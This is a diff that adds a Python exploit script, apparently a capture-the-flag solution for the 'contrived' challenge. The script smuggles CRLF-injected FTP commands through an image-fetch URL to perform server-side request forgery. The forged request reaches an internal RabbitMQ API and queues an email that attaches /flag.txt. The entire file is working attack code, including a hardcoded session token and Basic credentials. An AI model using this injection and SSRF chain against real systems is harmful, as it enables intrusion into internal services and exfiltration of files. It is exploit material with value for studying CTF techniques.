|
| 1 | +import requests |
| 2 | +import base64 |
| 3 | +import urllib |
| 4 | + |
| 5 | +#Joint effort by mementomori and Jazzy |
| 6 | + |
| 7 | +API_URL = 'http://contrived.pwni.ng/api' |
| 8 | +AUTH = 'e8d880e6-9b42-40e9-8b11-bc79fd6c083c' |
| 9 | + |
| 10 | +SSRF_HOST, SSRF_PORT = '172.32.56.72', 15672 |
| 11 | +SSRF_BODY = '''POST /api/exchanges/%2F/amq.default/publish HTTP/1.1 |
| 12 | +Host: rabbit:15672 |
| 13 | +Authorization: Basic dGVzdDp0ZXN0 |
| 14 | +User-Agent: curl/7.52.1 |
| 15 | +Accept: */* |
| 16 | +Content-Length: 336 |
| 17 | +Content-Type: application/json |
| 18 | +
|
| 19 | +{"vhost": "/", "name": "amq.default", "properties": {"delivery_mode": 1, "headers": {}}, "routing_key": "email", "delivery_mode": "1", "payload": "{\\"text\\": \\"pepega\\", \\"to\\": \\"[email protected]\\", \\"attachments\\": [{\\"filename\\": \\"flag.txt\\", \\"path\\": \\"/flag.txt\\"}]}", "headers": {}, "props": {}, "payload_encoding": "string"} |
| 20 | +
|
| 21 | +'''.replace('\n', '\r\n')*800 |
| 22 | + |
| 23 | +PNG_HEADER = '\x89\x50\x4e\x47' |
| 24 | + |
| 25 | +s = requests.Session() |
| 26 | +s.cookies.update({'authentication': AUTH}) |
| 27 | + |
| 28 | +def upload_avatar(contents): |
| 29 | + r = s.post(API_URL + '/profile', json = {'image': base64.b64encode(contents)}) |
| 30 | + assert r.content == 'Profile updated' |
| 31 | + |
| 32 | +def get_uuid(): |
| 33 | + upload_avatar(PNG_HEADER) |
| 34 | + r = s.get(API_URL + '/self') |
| 35 | + return r.json()['profile'].split('/')[4] |
| 36 | + |
| 37 | +def do_ssrf(host, port, body): |
| 38 | + uuid = get_uuid() |
| 39 | + upload_avatar(PNG_HEADER + body) |
| 40 | + print uuid |
| 41 | + ftp_cmds = [ |
| 42 | + 'PORT {},{},{}'.format(host.replace('.', ','), port >> 8, port & 0xff), |
| 43 | + 'CWD user', |
| 44 | + 'CWD {}'.format(uuid), |
| 45 | + 'REST 4', |
| 46 | + 'RETR profile.png', |
| 47 | + ] |
| 48 | + url = 'ftp://anonymous%0d%0a{}:pass@ftp/'.format(urllib.quote('\r\n'.join(ftp_cmds))) |
| 49 | + r = requests.get(API_URL + '/image?url=' + urllib.quote(url)) |
| 50 | + |
| 51 | +do_ssrf(SSRF_HOST, SSRF_PORT, SSRF_BODY) |
0 commit comments